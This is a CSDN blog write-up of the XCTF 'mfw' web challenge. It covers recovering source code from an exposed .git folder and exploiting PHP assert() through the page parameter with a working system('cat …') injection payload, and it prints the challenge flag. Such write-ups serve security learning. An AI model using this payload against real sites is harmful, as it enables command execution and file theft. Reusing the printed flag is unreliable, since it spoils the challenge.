攻防世界：mfw

最新推荐文章于 2024-04-09 16:10:20 发布

FW_ENJOEY

最新推荐文章于 2024-04-09 16:10:20 发布

阅读量190

点赞数

分类专栏： CTF_Web_Writeup 攻防世界XCTF

本文链接：https://blog.csdn.net/qq_46230755/article/details/112442629

版权

CTF_Web_Writeup 同时被 2 个专栏收录

51 篇文章 3 订阅

订阅专栏

攻防世界XCTF

10 篇文章 1 订阅

订阅专栏

打开题目，发现提示了Git，果断上工具扫描
在这里插入图片描述
用工具扫描发现存在.git

用GitHack将网站文件下载下来

里面存在一个flag.php

再打开源码进行源码的查看，题目存在page参数的接收

<?php

if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

?>

因为assert函数具有将读入的代码，作为php代码执行的作用，于是直接对strpos函数进行闭合
构造payload

/?page='.system("cat templates/flag.php").'

在源码中进行flag的chakan
在这里插入图片描述

Flag：

cyberpeace{958fa366e25c3ce77a3e34955240d72c}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

FW_ENJOEY

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

Gjhnsn.github.io:MFW投资组合

03-30

2. **个人投资组合**: MFW投资组合可能代表一个特定的投资模型或策略，用户可以在此展示他们的投资选择、历史回报和风险管理策略。这样的网站通常包括投资组合概述、资产配置、市场分析和投资目标等内容。 3. **...

攻防世界 mfw（Git源码泄露与命令执行漏洞）

Welcome To Myon'Blog !

06-01

2380

Git 源码泄露： 1、strpos() 函数 2、assert()函数 3、file_exists() 函数 4、die()函数代码审计：命令执行漏洞：

1 条评论您还未登录，请先登录后发表或查看评论

攻防世界-web-mfw

wuh2333的博客

06-28

643

攻防世界，mfw

攻防世界——mfw

m0_62063669的博客

06-23

1612

攻防世界——mfw当前大量开发人员使用git进行版本控制，对站点自动部署。如果配置不当，可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。发现有Git，可能是Git泄露，直接/.git 确实存在git泄露那我们使用GitHack还原在templates目录下发现了flag.php，在index.php中发现关键代码strpos()函数查找".."在$file中第一次出现的位置。如果没有找到则返回falsefile_exists()函数检查$file是否存在assert()函数会将括号中的

【愚公系列】2023年05月攻防世界-Web（mfw）

时光隧道

05-26

8069

Git源码泄露是指Git代码管理平台（如GitHub、GitLab）上的Git版本控制系统（VCS）源代码被非授权的第三方人员或组织获取和使用的情况。这种泄露可能导致代码、密码、私人密钥等敏感数据暴露，使得Git代码库的安全受到威胁。Git源码泄露可能会导致严重的后果，例如造成恶意代码、信息泄漏、网络攻击等问题。因此，保护Git代码库的安全非常重要，并采取措施防止源码泄露的情况发生。PHP是一种常用的服务器端脚本语言，安全特性是指在PHP编程中遵循一些安全规则、使用安全函数等，以防止代码被利用来进行攻击。

攻防世界-mfw-(详细操作)做题笔记

qq_43715020的博客

06-16

4072

攻防世界-mfw-(详细操作)做题笔记

peach-pit-mfw：MFW第一天示例

02-25

"peach-pit-mfw"似乎是一个项目或教程的名称，它以"MFW第一天示例"为主题，意在引导用户了解或学习某个特定的技术或流程。"MFW"可能是"Monday First Working"的缩写，暗示这是系列教程的第一天，通常会介绍基础概念...

gmfw：基于MFW和BMFW的简单WordPress主题

02-22

GMFW 一个基于MFW和BMFW的简单WordPress主题。 MFW：： BMFW：：//bettermotherfuckingwebsite.com/ 请访问。

mfw-bootstrap

04-02

在压缩包文件"mfw-bootstrap-main"中，我们可以期待找到以下关键文件和目录： 1. **index.html** - 这通常是项目的主入口文件，展示了如何引入和使用Bootstrap模板及组件。 2. **css** - 包含自定义CSS样式文件，...

mfw-portfolio:移动友好投资组合决赛'20

03-31

"mfw-portfolio:移动友好投资组合决赛'20"是一个项目，主要关注于创建一个适应移动设备的投资组合页面，这在当前移动优先的互联网环境中至关重要。该项目可能旨在展示参赛者在网页设计和开发，尤其是CSS（层叠样式表...

CTF网络安全攻防介绍

12-19

主要介绍网络安全攻防的安全知识，以及需要的编码和所需要的

【攻防世界】mfw（.git文件泄露）

最新发布

2302_79800344的博客

04-09

796

【代码】【攻防世界】mfw（.git文件泄露 + ）

攻防世界题目练习——Web引导模式（三）（持续更新）

qq_48550824的博客

10-16

801

它能解析 .git/index 文件，并找到工程中所有的：文件名和文件 sha1，然后去 .git/objects/ 文件夹下下载对应的文件，通过 zlib 解压文件，按原始的目录结构写入源代码。下载完成后，因为看到前面的参考博客里是用的__init__.py文件来下载，于是在我下载的githacker-master的目录下的lib目录中找到了这个文件，按照那篇博客上的命令还是没法下载。/etc/passwd ，但是发现。在博客3讲的拼接不是很详细，没太懂这样构造之后在代码中是怎么拼接的，于是看了博客1.

【网络安全 | CSAW】攻防世界mfw解题详析（Git泄露+命令执行）

等风来

05-29

4740

Git是一个非常流行的开源分布式版本控制系统，它被广泛用于协同开发和代码管理。许多网站和应用程序都使用Git作为其代码管理系统，并将其部署到生产环境中以维护其代码库。通过枚举工具或搜索引擎来查找带有.git文件夹的存储库，以获取包含未加密密码、凭据和敏感信息的站点代码库。由于该代码仅对目录遍历进行防范，因此可构造POC，执行系统命令。文件夹被直接部署到线上环境中，这可能会导致Git泄露问题。下载站点存储库的整个代码历史记录和配置信息。然而，在配置不当的情况下，可能会导致。由于下载得到的文件中，

攻防世界mfw解题wp

qq_56426046的博客

10-09

681

开始点点点发现php源码，bootstrap写的，好像还有git备份，猜测git源码泄露。打开templates发现flag.php，但是没有。page参数拼接，还有assert可以进行命令执行。发现了/.git/目录，确定是git源码泄露。根据第二个assert函数构造payload。然后用dirbuster扫一下目录。url传参，查看源码发现flag。使用githack工具下载源码。打开index.php代码审计。只身千里客，孤枕一灯秋。

mfw(攻防世界）

m0_70819573的博客

02-25

377

2.在about界面上发现了Git，自然想到githack获取源码，发现index.php中的assert函数未经有任何过滤。1.打开环境，审计代码。3.利用payload。

攻防世界----ics-05

qq_44418229的博客

07-19

376

攻防世界----ics-05 知识点:伪协议读取文件，xff伪造ip，preg_replace()命令执行

【攻防世界】十八、mfw

Hi~ 土拨鼠

10-19

782

步骤打开所给场景：点击发现一共有三个页面，是靠传递page参数来显示内容查看网页源代码发现还有隐藏的flag页面，但是啥都不显示试着输入其他字符则显示错误页面很可能设置的是白名单，回过头来发现about页面说明使用了git，试着输入.git查看有没有源码泄露确定了有git源码泄露，不知道为啥刷新了一下样式变了使用lijiejie的工具GitHack：https://github.com/lijiejie/GitHack来下载源码注意：代码使用python2写的，记得使用正.

mfw-template-0.1b2：Python库资源详解

资源摘要信息:"本资源为Python库的压缩包文件，全名为mfw-template-0.1b2.tar.gz，适用于Python语言。该资源是一个官方发布的版本，版本号为0.1b2，表示这是一个处于测试阶段的beta版本。用户可以通过提供的安装方法...